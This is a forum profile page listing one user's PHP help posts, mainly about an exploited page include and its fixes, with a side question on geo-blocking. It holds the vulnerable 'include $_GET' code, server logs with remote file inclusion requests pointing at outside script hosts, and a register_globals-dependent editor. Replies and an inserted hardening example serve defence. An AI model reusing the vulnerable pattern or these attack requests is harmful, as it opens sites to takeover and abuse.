drfate
Posts posted by drfate
-
-
I also found an example at;
GeoIPEnable On
GeoIPDBFile /path/to/GeoIP.dat
# Redirect one country
RewriteEngine on
RewriteCond %{ENV:GEOIP_COUNTRY_CODE} ^CA$
RewriteRule ^(.*)$ http://www.canada.com$1 [L]
So if I put this HTACCESS file in a directory called comp, I could use the above code to redirect?
cheers,
Andrew
-
You can block by .HTACCESS, however from what I can understand, it blocks access to your entire site which is not what I want to achieve
-
Hi everyone,
is it possible to block certain countries from accessing individual pages?
For example, we have a competition page and we only want Australian users to access it?
Can this be done through PHP? I don't want to block ENTIRE countries from the entire site, just a particular page?
Thanks in advance.
cheers,
Andrew
-
http://www.pacote270178.xpg.com.br/teste2.txt
lol..... It looks like whoever exploited your site is using your server to mass email. Depending on how many people he's spamming, you might get some fun messages soon ;p.
First off, don't let people pass in the extension. There's no reason to. I would use just PHP pages.
Second, restrict it somehow. A good way to do it if all of the files are in the same folder (and nothing unsafe is in said folder) is to do the following:
$page = (isset($_GET['page'])) ? trim($_GET['page']) : 'default';
// Only letters, digits, underscore, space and hyphen: no dots, slashes or URLs
if (preg_match('/^[a-zA-Z0-9_ -]+$/', $page) && file_exists('some/folder/' . $page . '.php')) {
    require 'some/folder/' . $page . '.php';
} else {
    echo "Page not found!";
}
Hi Corbin,
thanks for your help.
Just a quick question, I have a .htaccess file which displays the following:
RewriteRule ^dvd(.*).html$ dvdgeneraldisplay.php?page=dvd/dvd$1&type=htm [L,NC]
and I put the following code in:
<?php
$page = (isset($_GET['page'])) ? trim($_GET['page']) : 'default';
if(preg_match('^[a-zA-Z0-9_ -]+$', $page) && file_exists('dvd/' . $page . '.php)) {
require 'dvd/' . $page . '.php;
}
else {
echo "Page not found!";
}
?>
Then I get the error: Parse error: syntax error, unexpected T_STRING in /home2/impulse/public_html/dvdgeneraldisplay.php on line 111
What am I missing?
-
1. This has nothing to do with object oriented programming (OOP).
2. Code tags are your friends.
3. Your problem stems from not securing your incoming query strings. At all.
A simple way to fix your problem is to create a whitelist of possible page values that actually represent the pages of your site, assuming your site is small (say fewer than 20 pages). Then you can compare the incoming value with your list of legit pages.
$allowedPages = array("home", "news", "contact", "faqs"); // example values...replace with your actual page names
$page = strtolower($_GET['page']); // make sure the incoming value is all lowercase
if (!in_array($page, $allowedPages)) {
    echo "I don't think so....";
} else {
    include $page . '.' . $type;
}
Hi Nightslyr, unfortunately my site has quite a few pages, any other ideas?
-
Mchl wrote:
Don't include when $_GET['page'] contains "http://" seems like the quickest (but not necessarily the best) solution.
How do I fix this?
-
Hi Everyone,
I've got the following code in a PHP which opens up a .HTM
<?php
if (isset($_GET["page"])){
$thepage = $_GET["page"];
$thetype = $_GET["type"];
include $thepage.'.'.$thetype;
}
?>
The problem is, this code is being exploited (see below for example).
Does anyone know how to stop this?
189.81.16.230 - - [12/Nov/2008:15:00:13 -0500] "GET /favicon.ico HTTP/1.1" 404 - "http://www.mydomain.com/dvdgeneraldisplay.php?page=http://www.pacote270178.xpg.com.br/teste2.txt?" "Opera/9.52 (Windows NT 5.1; U; pt-BR)"
74.6.22.180 - - [12/Nov/2008:16:09:09 -0500] "GET /dvdgeneraldisplay.php?page=dvd/dvdstarwarsanimatedadventuresewoks&type=htm HTTP/1.0" 200 3972 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
70.38.54.118 - - [12/Nov/2008:23:58:35 -0500] "GET /dvdgeneraldisplay.php?page=dvd/dvdstarwarsclonewars&type=htm/display.php?pg=http://masla.su/apache/idxx.txt?? HTTP/1.1" 200 15209 "-" "Mozilla/5.0"
70.38.54.118 - - [12/Nov/2008:23:58:35 -0500] "GET /dvdgeneraldisplay.php?page=dvd/display.php?pg=http://masla.su/apache/idxx.txt?? HTTP/1.1" 200 15266 "-" "Mozilla/5.0"
124.0.208.252 - - [13/Nov/2008:00:41:19 -0500] "GET /dvdgeneraldisplay.php?page=dvd/display.php?pg=http://www.geocities.com/tutimasripah/fx29id.txt?? HTTP/1.1" 200 15272 "-" "Mozilla/5.0"
124.0.208.252 - - [13/Nov/2008:00:41:19 -0500] "GET /dvdgeneraldisplay.php?page=dvd/dvdstarwarsclonewars&type=htm/display.php?pg=http://www.geocities.com/tutimasripah/fx29id.txt?? HTTP/1.1" 200 15104 "-" "Mozilla/5.0"
189.81.16.230 - - [13/Nov/2008:05:38:55 -0500] "GET /favicon.ico HTTP/1.1" 404 - "http://www.mydomain.com/dvdgeneraldisplay.php?page=http://www.pacote270178.xpg.com.br/teste2.txt?" "Opera/9.52 (Windows NT 5.1; U; pt-BR)"
189.81.16.230 - - [13/Nov/2008:06:14:07 -0500] "GET /favicon.ico HTTP/1.1" 404 - "http://www.mydomain.com/dvdgeneraldisplay.php?page=http://www.pacote270178.xpg.com.br/teste2.txt?" "Opera/9.52 (Windows NT 5.1; U; pt-BR)"
cheers,
Andrew
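Added example, not part of the original post or any reply: one way to harden the include shown above so that neither a remote URL nor a path outside the content folder can be loaded. It assumes the pages are static .htm files under a dvd/ folder next to the script, and that the rewrite rule is changed to pass only the file name (page=dvd$1) with no directory and no type parameter; resolve_page() is a hypothetical helper name.

```php
<?php
// Added example: hardened replacement for include $thepage.'.'.$thetype;
// Assumption: content is static HTML stored as dvd/<name>.htm.

/**
 * Map a requested page name to a real file inside $baseDir, or return null.
 * resolve_page() is a hypothetical helper, not from the original thread.
 */
function resolve_page(string $page, string $baseDir): ?string
{
    // Character allowlist: no dots, slashes, colons or NUL bytes,
    // so "http://..." and "../" can never pass.
    if (!preg_match('/\A[a-zA-Z0-9_-]{1,64}\z/', $page)) {
        return null;
    }
    $base = realpath($baseDir);
    if ($base === false) {
        return null;
    }
    // The extension is fixed server-side; the client no longer supplies it.
    $candidate = realpath($base . DIRECTORY_SEPARATOR . $page . '.htm');
    if ($candidate === false) {
        return null; // file does not exist
    }
    // realpath() resolves symlinks, so confirm the result is still in $base.
    $prefix = $base . DIRECTORY_SEPARATOR;
    if (strncmp($candidate, $prefix, strlen($prefix)) !== 0) {
        return null;
    }
    return $candidate;
}

$page = (isset($_GET['page']) && is_string($_GET['page'])) ? $_GET['page'] : '';
$file = resolve_page($page, __DIR__ . '/dvd');

if ($file === null) {
    http_response_code(404);
    echo 'Page not found!';
} else {
    // readfile() sends the file as-is; include would execute any PHP inside it.
    readfile($file);
}
```

Setting allow_url_include to Off in php.ini (the default since PHP 5.2) blocks the http:// form of the request seen in the log, but the path checks above are still needed for local files.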
-
hi there,
thanks for the assistance but unfortunately it didn't work. The server guys apparently installed phpsuexec after the crash happened over a week ago and registry_global = off? Would that be causing this?
regards,
Andrew
-
Hi all,
being a user at webfreaks for the last 2 years, their hard drive crashed a few weeks ago and now my simple PHP text editor will not work, I know they have done something on their end because it worked for the last two years. Here is the code that once worked:
It basically showed a list of text which I could edit online, nothing special but nice and quick, anyone know why this won't work anymore? The error I'm getting is:
Notice: Undefined variable: submit in /home2/impulse/public_html/admin/edit.php on line 3
Notice: Undefined variable: data in /home2/impulse/public_html/admin/edit.php on line 11
However, I never used to get this error until the server fiddled with something :( I'm at my wits end, any help would be GREATLY appreciated.
FILENAME: edit.php
<?php
if ($submit) {
$fp = fopen("data.txt", "w");
fwrite($fp, stripslashes($newdata));
fclose($fp);
}
$fp = fopen("data.txt", "r");
while (!feof($fp)) {
$data .= fgets($fp, 4096);
}
fclose($fp);
?>
<html>
<head>
<title>simple text editor</title>
</head>
<?php
$filemod = filemtime('data.txt');
$filemodtime = date("F j Y h:i:s A", $filemod);
echo "<center>This File was last updated $filemodtime</center>";
?>
</font>
<CENTER>
<form action="<? print $PHP_SELF; ?>" method="post">
<textarea name="newdata" rows="26" cols="40">
<?
print $data;
?>
</textarea><br>
<input type="submit" name="submit" value="Submit"></form>
Blocking Countries to certain PHP Pages?
in PHP Coding Help
Posted
Hmm... unfortunately I cannot install GeoIP on my server.
Does anyone know the code I would use in my .htaccess to ban certain countries?
e.g. domains with .au ?
cheers,
Andrew